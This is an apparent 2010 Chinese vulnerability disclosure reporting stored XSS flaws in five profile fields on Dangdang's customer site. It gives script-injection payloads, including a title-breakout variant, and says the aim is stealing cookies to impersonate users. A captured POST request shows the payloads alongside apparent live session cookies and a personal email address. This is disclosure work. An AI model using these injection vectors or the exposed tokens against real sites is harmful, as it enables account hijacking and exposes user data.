漏洞标题: 当当网多处存储型XSS漏洞
相关厂商: 当当网
漏洞作者: riusksk
提交时间: 2010-08-22
公开时间: 2010-08-22
漏洞类型: 跨站脚本攻击
危害等级: 中
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:
漏洞详情
简要描述:

当当网存在多处存储型XSS漏洞
详细说明:

在当当网的编辑个人档案中存在5处XSS漏洞,前4处分别出现在博客地址、兴趣爱好、喜欢或欣赏的人和自我介绍中,向其写入XSS语句 <script>alert(/1/)</script> 均可被执行,另外一处出现在昵称中,由于有长度限制,因此可通过本地构造POST表单来提交 </title><script>alert(/1/)</script> 执行js脚本,用于窃取用户cookie并仿冒用户登录。


漏洞证明:

Host=customer.dangdang.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 (BT-beachlife) Firefox/3.6.8
Accept=text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=zh-cn,zh;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Referer=http://customer.dangdang.com/profile/Myarchives.php?save=ok
Cookie=__permanent_id=20100203235038955135819263359204968; __new_p_id=1; __ozlvd=1282408219; producthistoryname=Windows%C4%DA%BA%CB%CA%B5%D1%E9%BD%CC%B3%CC%28%B8%BD%B9%E2%C5%CC
%29%2CWeb+%B0%B2%C8%AB%B2%E2%CA%D4%2CWeb%C8%EB%C7%D6%B0%B2%C8%AB%B2%E2%CA%D4%D3%EB%B6%D4%B2%DF%A3%A8%B8%BDCD-ROM%B9%E2%C5%CC%D2%BB%D5%C5%A3%A9%2CSQL%D7%A2%C8%EB%B9%A5%BB%F7%D3%EB
%B7%C0%D3%F9%A3%A8%B0%B2%C8%AB%BC%BC%CA%F5%BE%AD%B5%E4%D2%EB%B4%D4%A3%A9%2CPHP%BA%CDMySQL+Web%BF%AA%B7%A2+%A3%A8%D4%AD%CA%E9%B5%DA4%B0%E6%A3%A9%2CWEB%B0%B2%C8%AB%CA%D6%B2%E1%2C
%BB%D2%C3%B1%B9%A5%BB%F7%B0%B2%C8%AB%CA%D6%B2%E1%A1%AA%A1%AA%C9%F8%CD%B8%B2%E2%CA%D4%D3%EB%C2%A9%B6%B4%B7%D6%CE%F6%BC%BC%CA%F5%2C%BA%DA%BF%CD%B9%A5%B7%C0%BC%BC%CA
%F5%B1%A6%B5%E4%3A+Web%CA%B5%D5%BD%C6%AA%2C%CD%F8%C2%E7%C9%F8%CD%B8%B2%E2%CA%D4%A3%AD%B1%A3%BB%A4%CD%F8%C2%E7%B0%B2%C8%AB%B5%C4%BC%BC%CA%F5%A1%A2%B9%A4%BE%DF%BA%CD%B9%FD%B3%CC%2C
%CD%F8%C2%E7%B0%B2%C8%AB%C6%C0%B9%C0%A3%A8%B5%DA%B6%FE%B0%E6%A3%A9; 
producthistoryid=683764%2C20810140%2C9222047%2C20848476%2C20546846%2C9150871%2C9272693%2C20653653%2C20080185%2C20842796; validatedflag=0; cart_id=1005102129448895; 
__utma=263274265.1985588993.1278076754.1282149439.1282284535.9; __utmz=263274265.1282284535.9.4.utmcsr=product.dangdang.com|utmccn=(referral)|utmcmd=referral|utmcct=/product.aspx; 
HK=web%25B0%25B2%25C8%25AB%25B2%25E2%25CA%25D4%3B%25B0%25B2%25C8%25AB%25C2%25A9%25B6%25B4%25D7%25B7%25D7%25D9%3BWEB%25B0%25B2%25C8%25AB%25B2%25E2%25CA%25D4%3Bsql
%25D7%25A2%25C8%25EB%3BWeb%25C8%25EB%25C7%25D6%3B%25C9%25F8%25CD%25B8%3B%25C9%25F8%25CD%25B8%25B2%25E2%25CA%25D4%3BWEB%25C9%25F8%25CD%25B8%25B2%25E2%25CA%25D4%3BWEB
%25B0%25B2%25C8%25AB; from=488-133054; cart_db_index=3; cart_items_count=0; ck_db_index=3; is_new=1; __trace_id=20100822000612281259688254741795619; agree_date=1; 
login.dangdang.com=.AYH=100822001255147579&.ASPXAUTH=I3swGtBNKlIZFcNLIaO4tWX30HRxb+KI; LD=raSYRlzfovLiO635sEBP0drFJ8zWhCcs; 
dangdang.com=email=NzczMDgxODc4QHFxLmNvbQ==&nickname=&display_id=5533648947491&customerid=

uGQo9p1MXgQ4TwpLZdhuKw==&viptype=4+AtZiSmtFY=&show_name=
%u0037%u0037%u0033%u0030%u0038%u0031%u0038%u0037%u0038; email=773081878%40qq.com; nickname=
Content-Type=multipart/form-data; boundary=---------------------------97891525516423
Content-Length=2559
POSTDATA =-----------------------------97891525516423
Content-Disposition: form-data;
3
-----------------------------97891525516423
Content-Disposition: form-data;; filename=""
Content-Type: application/octet-stream
-----------------------------97891525516423
Content-Disposition: form-data;
-----------------------------97891525516423
Content-Disposition: form-data;
27019229
-----------------------------97891525516423
Content-Disposition: form-data;
p3h4ck
-----------------------------97891525516423
Content-Disposition: form-data;
ctl04
-----------------------------97891525516423
Content-Disposition: form-data;
1
-----------------------------97891525516423
Content-Disposition: form-data;
116
-----------------------------97891525516423
Content-Disposition: form-data;
188
-----------------------------97891525516423
Content-Disposition: form-data;
116
-----------------------------97891525516423
Content-Disposition: form-data;
Rd_sex_1
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
student
-----------------------------97891525516423
Content-Disposition: form-data;
±¾¿ÆÉú
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
0
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/1/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/2/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/3/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
<script>alert(/4/)</script>
-----------------------------97891525516423
Content-Disposition: form-data;
±£´æ»ù±¾ÐÅÏ¢
-----------------------------97891525516423--

修复方案:

过滤跨站关键字